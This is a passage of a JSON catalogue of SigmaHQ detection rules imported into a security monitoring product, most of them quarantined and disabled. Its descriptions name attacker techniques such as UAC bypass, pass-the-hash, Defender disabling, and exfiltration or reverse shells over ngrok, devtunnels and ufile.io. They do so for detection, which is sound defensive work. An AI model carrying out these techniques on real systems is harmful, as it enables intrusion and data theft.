"rules/windows/process_creation/proc_creation_win_net_use_network_connections_discovery.yml" } }, { "id": "sigmahq-sigma-1c71e254-6655-42c1-b2d6-5e4718d7fc0a", "type": "detection", "name": "Azure Kubernetes CronJob", "description": "Identifies when an Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-cronjob.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c71e254-6655-42c1-b2d6-5e4718d7fc0a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_cronjob.yml" } }, { "id": "sigmahq-sigma-1c8774a0-44d4-4db0-91f8-e792359c70bd", "type": "detection", "name": "REGISTER_APP.VBS Proxy Execution", "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", 
"enabled": false, "path": "detections/sigma-imports/_quarantine/register-app-vbs-proxy-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml" } }, { "id": "sigmahq-sigma-1c8e96cd-2bed-487d-9de0-b46c90cade56", "type": "detection", "name": "Potential Qakbot Registry Activity", "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-qakbot-registry-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_malware_qakbot_registry.yml" } }, { "id": "sigmahq-sigma-1ca6bd18-0ba0-44ca-851c-92ed89a61085", "type": "detection", "name": "UAC Bypass Using Consent and Comctl32 - Process", "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ 
"T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-consent-and-comctl32-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml" } }, { "id": "sigmahq-sigma-1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b", "type": "detection", "name": "DNS Query To Devtunnels Domain", "description": "Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-devtunnels-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_devtunnels_communication.yml" } }, { "id": "sigmahq-sigma-1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", "type": "detection", "name": "DNS Query To Ufile.io", "description": "Detects DNS queries to \"ufile.io\", which was seen abused by malware and threat 
actors as a method for data exfiltration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-ufile-io.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_ufile_io_query.yml" } }, { "id": "sigmahq-sigma-1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", "type": "detection", "name": "Suspicious Rundll32 Invoking Inline VBScript", "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-rundll32-invoking-inline-vbscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_inline_vbs.yml" } }, { "id": "sigmahq-sigma-1cdd9a09-06c9-4769-99ff-626e2b3991b8", "type": 
"detection", "name": "Suspicious Double Extension File Execution", "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/suspicious-double-extension-file-execution.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_double_extension.yml" } }, { "id": "sigmahq-sigma-1ce8c8a3-2723-48ed-8246-906ac91061a6", "type": "detection", "name": "Possible PetitPotam Coerce Authentication Attempt", "description": "Detect PetitPotam coerced authentication activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/possible-petitpotam-coerce-authentication-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/security/win_security_petitpotam_network_share.yml" } }, { "id": "sigmahq-sigma-1cf465a1-2609-4c15-9b66-c32dbe4bfd67", "type": "detection", "name": "Legitimate Application Writing Files In Uncommon Location", "description": "Detects legitimate applications writing any type of file to uncommon or suspicious locations that are not typical for application data storage or execution.\nAdversaries may leverage legitimate applications (Living off the Land Binaries - LOLBins) to drop or download malicious files to uncommon locations on the system to evade detection by security solutions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/legitimate-application-writing-files-in-uncommon-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1cf465a1-2609-4c15-9b66-c32dbe4bfd67", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location.yml" } }, { "id": "sigmahq-sigma-1cf98dc2-fcb0-47c9-8aea-654c9284d1ae", "type": "detection", "name": "Disk Image Creation Via Hdiutil - MacOS", "description": "Detects the execution of the hdiutil utility in order to create a disk image.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/disk-image-creation-via-hdiutil-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1cf98dc2-fcb0-47c9-8aea-654c9284d1ae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml" } }, { "id": "sigmahq-sigma-1d08ac94-400d-4469-a82f-daee9a908849", "type": "detection", "name": "Communication To Ngrok Tunneling Service Initiated", "description": "Detects an executable initiating a network connection to \"ngrok\" tunneling domains.\nAttackers were seen using this \"ngrok\" in order to store their second stage payloads and malware.\nWhile communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1568.002", "T1572", "T1090", "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/communication-to-ngrok-tunneling-service-initiated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1d08ac94-400d-4469-a82f-daee9a908849", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_ngrok_tunnel.yml" } }, { "id": "sigmahq-sigma-1d174d38-8fda-4081-a9b6-56d9763c0cd8", "type": "detection", "name": 
"Scheduled Task Creation with Curl and PowerShell Execution Combo", "description": "Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.\nThis facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1218", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-task-creation-with-curl-and-powershell-execution-combo.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1d174d38-8fda-4081-a9b6-56d9763c0cd8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_curl_and_powershell_combo.yml" } }, { "id": "sigmahq-sigma-1d2ab8ac-1a01-423b-9c39-001510eae8e8", "type": "detection", "name": "Azure AD Health Service Agents Registry Keys Access", "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. 
Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-ad-health-service-agents-registry-keys-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" } }, { "id": "sigmahq-sigma-1d2de8a6-4803-4fde-b85b-f58f3aa7a705", "type": "detection", "name": "Potentially Suspicious WDAC Policy File Creation", "description": "Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-wdac-policy-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "1d2de8a6-4803-4fde-b85b-f58f3aa7a705", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_wdac_policy_creation.yml" } }, { "id": "sigmahq-sigma-1d61f71d-59d2-479e-9562-4ff5f4ead16b", "type": "detection", "name": "Suspicious Service Installation", "description": "Detects suspicious service installation commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_susp.yml" } }, { "id": "sigmahq-sigma-1da8ce0b-855d-4004-8860-7d64d42063b1", "type": "detection", "name": "Apache Segmentation Fault", "description": "Detects a segmentation fault error message caused by a crashing apache worker process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1499.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/apache-segmentation-fault.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine 
yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1da8ce0b-855d-4004-8860-7d64d42063b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/product/apache/web_apache_segfault.yml" } }, { "id": "sigmahq-sigma-1dd05363-104e-4b4a-b963-196a534b03a1", "type": "detection", "name": "Potential Suspicious Mofcomp Execution", "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-mofcomp-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1dd05363-104e-4b4a-b963-196a534b03a1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mofcomp_execution.yml" } }, { "id": "sigmahq-sigma-1ddc1472-8e52-4f7d-9f11-eab14fc171f5", "type": "detection", "name": "PowerShell Decompress Commands", "description": "A General detection for specific decompress commands in PowerShell logs. 
This could be an adversary decompressing files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-decompress-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml" } }, { "id": "sigmahq-sigma-1dde5376-a648-492e-9e54-4241dd9b0c7f", "type": "detection", "name": "Diskshadow Script Mode - Uncommon Script Extension Execution", "description": "Detects execution of \"Diskshadow.exe\" in script mode to execute a script with a potentially uncommon extension.\nInitial baselining of the allowed extension list is required.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/diskshadow-script-mode-uncommon-script-extension-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1dde5376-a648-492e-9e54-4241dd9b0c7f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml" } }, { "id": "sigmahq-sigma-1de68c67-af5c-4097-9c85-fe5578e09e67", "type": "detection", "name": "WCE wceaux.dll Access", "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wce-wceaux-dll-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1de68c67-af5c-4097-9c85-fe5578e09e67", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_mal_wceaux_dll.yml" } }, { "id": "sigmahq-sigma-1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", "type": "detection", "name": "Potential Script Proxy Execution Via CL_Mutexverifiers.ps1", "description": "Detects the use of the Microsoft signed script \"CL_mutexverifiers\" to proxy the execution of additional PowerShell script commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-script-proxy-execution-via-cl-mutexverifiers-ps1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml" } }, { "id": "sigmahq-sigma-1e53dd56-8d83-4eb4-a43e-b790a05510aa", "type": "detection", "name": "Always Install Elevated MSI Spawned Cmd And Powershell", "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/always-install-elevated-msi-spawned-cmd-and-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml" } }, { "id": "sigmahq-sigma-1e59c230-6670-45bf-83b0-98903780607e", "type": "detection", "name": "Gpscript Execution", "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gpscript-execution.yaml", "quarantine_reason": 
"imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1e59c230-6670-45bf-83b0-98903780607e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml" } }, { "id": "sigmahq-sigma-1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c", "type": "detection", "name": "Arbitrary File Download Via Squirrel.EXE", "description": "Detects the usage of the \"Squirrel.exe\" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-file-download-via-squirrel-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_squirrel_download.yml" } }, { "id": "sigmahq-sigma-1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e", "type": "detection", "name": "PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction'", "description": "Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9').\nThis is a highly suspicious configuration change that 
effectively disables Defender's ability to automatically mitigate threats of a certain severity level.\nAn attacker might use this technique via the command line to bypass defenses before executing payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-defender-threat-severity-default-action-set-to-allow-or-noaction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_defender_default_action_modified.yml" } }, { "id": "sigmahq-sigma-1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", "type": "detection", "name": "ADFS Database Named Pipe Connection By Uncommon Tool", "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/adfs-database-named-pipe-connection-by-uncommon-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 
"source": "SigmaHQ/sigma", "source_id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml" } }, { "id": "sigmahq-sigma-1ec65a5f-9473-4f12-97da-622044d6df21", "type": "detection", "name": "Powershell Defender Disable Scan Feature", "description": "Detects requests to disable Microsoft Defender features using PowerShell commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-defender-disable-scan-feature.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ec65a5f-9473-4f12-97da-622044d6df21", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" } }, { "id": "sigmahq-sigma-1edd77db-0669-4fef-9598-165bda82826d", "type": "detection", "name": "Guacamole Two Users Sharing Session Anomaly", "description": "Detects suspicious session with two users present", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1212" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/guacamole-two-users-sharing-session-anomaly.yaml", "quarantine_reason": 
